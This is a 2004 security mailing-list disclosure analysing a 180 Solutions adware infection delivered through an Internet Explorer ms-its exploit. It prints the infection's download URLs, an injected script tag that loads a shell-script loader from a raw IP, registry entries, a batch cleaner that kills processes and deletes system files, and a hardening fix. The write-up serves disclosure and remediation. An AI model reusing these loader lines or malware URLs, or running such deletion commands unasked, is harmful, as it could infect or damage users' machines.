180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits)

• Previous message: Antonio Calvillo: "Re: Russ Cooper's AusCERT Presentation on MS Security Bulletins"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Thu, 3 Jun 2004 04:20:48 +0200
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

                                                                     180
Solutions Exploits and Toolbars Hacking Patched Users

By Rafel Ivgi, The-Insider

Table Of Contents:
*********************
1. Class Name
2. Infecting Files
3. Related Registery Entries
4. Cleaner
5. Solution
6. Visit : http://theinsider.deep-ice.com

1. Class Name: iiittt Class
****************************
*Comment : All actions preformed on your machine are logged in the following
hidden file:
C:\WINDOWS\system32\log.bak.txt

Class Id : {FE1A240F-B247-4E06-A600-30E28F5AF3A0}
Downloading c:\install.cab
Excuting c:\install.htm

2. Infecting Files:
********************
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=!!generate!!&partner_id=&product_id=&browser_ok=y&rnd=34&basename=msbb&SID=YJGHCHUV&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=42033152&TVM=2147352576&AVM=2084216832&FDS=1542299648&LAD=1601:1:1:0:0:0&WE=5
http://downloads.180solutions.com/keywords/kyf.258.gz to
c:\windows\system32\kyf.dat
http://installs.180solutions.com/downloads/boom/2.0/RBoomerang.1 to
C:\WINDOWS\abolaror.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.4&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=26&basename=msbb&SID=AZWDUFMF&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=49520640&TVM=2147352576&AVM=2070482944&FDS=1538985984&LAD=1601:1:1:0:0:0&WE=5
c:\windows\system32\FLEOK\msbb.exe from
http://installs.180solutions.com/downloads/5.6/msbb.exe
http://installs.180solutions.com/downloads/5.6/msbb.exe to
c:\windows\system32\FLEOK\msbb.exe
http://bis.180solutions.com/config.aspx?did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=9&basen
ame=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&SID=NYBQFSPS&OS=5.1.26
00.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.
2800.1&TPM=267890688&APM=70152192&TVM=2147352576&AVM=2070474752&FDS=15387238
40&LAD=1601:1:1:0:0:0&WE=5&TCA=0&SCA=0&MRDS=0
http://installs.180solutions.com/Downloads/DLL/3.0/ncmyb.dll to
c:\windows\system32\FLEOK\ncmyb.dll
http://tv.180solutions.com/showme.aspx?keyword=.tightasianass.com&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=32&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=61321216&TVM=2147352576&AVM=2051579904&FDS=1538109440&LAD=1601:1:1:0:0:0&WE=5
http://216.130.188.219/ei2/index.html
http://69.42.67.154/topbucks/tp2/index.html
http://216.130.188.219/ei2/installer.htm
http://69.42.67.154/topbucks/tp2/index.html
<SCRIPT%20SRC=\'http://216.130.188.219/ei2/shellscript_loader_js.php?ref=und
efined\'></SCRIPT>
http://exits.freepornpics.com/timed_exits/straight_timed_pop.htm
http://216.130.188.219/ei2/index.html
http://69.42.67.154/_mpbfpas/free_trial_multisite/index.html
http://tv.180solutions.com/showme.aspx?keyword=trial&did=565&ver=5.6&duid=75abwcaqgjvflgcejdnaqqqzfsuohz&partner_id=181844781&product_id=565&browser_ok=y&rnd=23&basename=msbb&MID=774831B9D28472F7ED045AA9D3CCF92902BD254A&bid=0&SID=NYBQFSPS&OS=5.1.2600.2&SLID=1037&ULID=1037&TLOC=1037&ACP=1255&OCP=862&DB=iexplore.exe&IEV=6.0.2800.1&TPM=267890688&APM=37040128&TVM=2147352576&AVM=2031108096&FDS=1536757760&LAD=1601:1:1:0:0:0&WE=5
http://exits.freepornpics.com/timed_exits/fpa_pinkpays.html
http://www.i-lookup.com/index1.php

3. Related Registery Entries:
******************************
[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
@="iiittt Class"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Control]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented
Categories]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Implemented
Categories\{7DD95802-9882-11CF-9FA9-00AA006C42C4}]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InprocServer
32]
@="C:\\WINDOWS\\System32\\windec32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus]
@="0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\MiscStatus\1
]
@="131473"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ProgID]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Programmable
]

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\ToolboxBitma
p32]
@="C:\\WINDOWS\\System32\\windec32.dll, 102"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\TypeLib]
@="{660B38CB-6349-4C67-A418-AADABAE09C38}"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Version]
@="1.0"

[HKEY_CLASSES_ROOT\CLSID\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\VersionIndep
endentProgID]
@="windec.iiittt"

[HKEY_CLASSES_ROOT\windec.iiittt]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_CLASSES_ROOT\windec.iiittt\CurVer]
@="windec.iiittt.1"

[HKEY_CLASSES_ROOT\windec.iiittt.1]
@="iiittt Class"

[HKEY_CLASSES_ROOT\windec.iiittt.1\CLSID]
@="{FE1A240F-B247-4E06-A600-30E28F5AF3A0}"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}]
"SystemComponent"=dword:00000000
"Installer"="MSICD"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\Contains\Files]
"C:\\WINDOWS\\System32\\windec32.dll"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\DownloadInformation]
"CODEBASE"="file://C:\\install.cab"
"INF"="C:\\WINDOWS\\Downloaded Program Files\\windec32.inf"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution
Units\{FE1A240F-B247-4E06-A600-30E28F5AF3A0}\InstalledVersion]
@="2,0,0,0"

4. Cleaner:
*************
Filename=180killer.bat:
 -------------------------------------------CUT
ERE -------------------------------------------------
taskkill /f /im iexplore.exe
taskkill /f /im explorer.exe
taskkill /f /im dllhost.exe
del c:\install.htm
del c:\install.cab
taskkill /f /im abolaror.exe
del C:\WINDOWS\abolaror.exe
taskkill /f /im msbb.exe
del c:\windows\system32\FLEOK\msbb.exe
taskkill /f /im apconaj.exe
del c:\windows\system32\apconaj.exe
taskkill /f /im alchem.exe
del c:\windows\alchem.exe
rmdir /s /q c:\windows\system32\FLEOK
rmdir /s /q c:\windows\sbnet
del C:\WINDOWS\System32\windec32.dll
explorer.exe
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v ShowBehind
/f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v msbb /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v abolaror
/f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v
chiqarsfneg /f
reg DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v alchem /f
 -------------------------------------------CUT
ERE -------------------------------------------------

5. Solution:
*************
The excution of this Internet Exploerer exploit was caused by ms-its[Even
Patched].
The ms-its protocol is not needed for windows normal operations, therefore
it should be removed.
XPLizer - Windows Hardning Frontend Tool - Updated for removing ms-its
protocol.
http://www.securiteam.com/tools/5EP081FCKI.html
The sources of XPLizer can be found at
http://theinsider.deep-ice.com/xplizer-src.zip
An executable version can be found at
http://theinsider.deep-ice.com/xplizer.zip
The official readme file for XPLizer can be found at
http://theinsider.deep-ice.com/readme.txt

-----
Patch Automation v6.0 by Mobile Automation, Inc. allows you to quickly
identify and fix all PC's that are exposed to the Sasser worm! Our
solution provides quick and seamless discovery and deployment of all your
PC computer's Microsoft security patching needs. Regardless of where
you're PC's reside (inside the LAN, at home or on the road), Patch
Automation gets the job done. Contact us to learn about our free 30-day
trial version at 800-344-1150 or visit our website at
<http://www.patchautomation.com>
-----

• Previous message: Antonio Calvillo: "Re: Russ Cooper's AusCERT Presentation on MS Security Bulletins"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages [Full-Disclosure] 180 Solutions Exploits and Toolbars Hacking Patched Users(I.E Exploits) ... taskkill /f /im iexplore.exe ... del c:\install.htm ... (Full-Disclosure) Re: count users on database / store script ... Via Exchange System Manager - Expand mailbox store - mailboxes - Right ... echo store a>> log.txt ... del something.ldf ... (microsoft.public.exchange.admin) Re: Gun Snods Suck! ... (note the deliberate lack of a smiley) ... or similar that I get on a visit to a store gets a "No. ... J. Del Col ... (rec.guns) Re: DAQ board no longer showing up in MAX, nor elsewhere. ... (del NI folder and any entries in the reg) ... (comp.lang.labview) Re: Outlook 2003 has size limit? ... store has reached its maximum size. ... del) delete them.' ... Outlook now tells me that I have exceeded my store size, ... > What's the error message say exactly? ... (microsoft.public.outlook.general)